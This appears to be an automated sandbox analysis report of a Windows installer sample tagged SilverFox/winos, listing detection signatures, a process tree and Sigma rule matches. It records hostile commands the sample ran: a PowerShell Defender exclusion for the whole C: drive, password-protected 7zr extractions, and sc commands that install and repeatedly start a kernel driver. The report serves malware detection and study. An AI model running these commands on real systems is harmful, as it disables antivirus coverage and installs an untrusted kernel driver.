
Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (renamed because original name is a hash value)
Original sample name: _1.0.4.exe
Analysis ID: 1579419
MD5: 44728e21199d2b04a4b25798625ac86e
SHA1: 382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256: 4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: 44728E21199D2B04A4B25798625AC86E)
    • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 3260 cmdline: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 4456 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: 44728E21199D2B04A4B25798625AC86E)
        • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 7264 cmdline: "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7348 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7448 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7332 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7520 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7552 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7860 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8108 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4192 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7228 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7596 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7316 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6992 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6932 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7208 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7332, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7332, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 86.6% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA598B0 FindFirstFileA,FindClose,6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00387496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
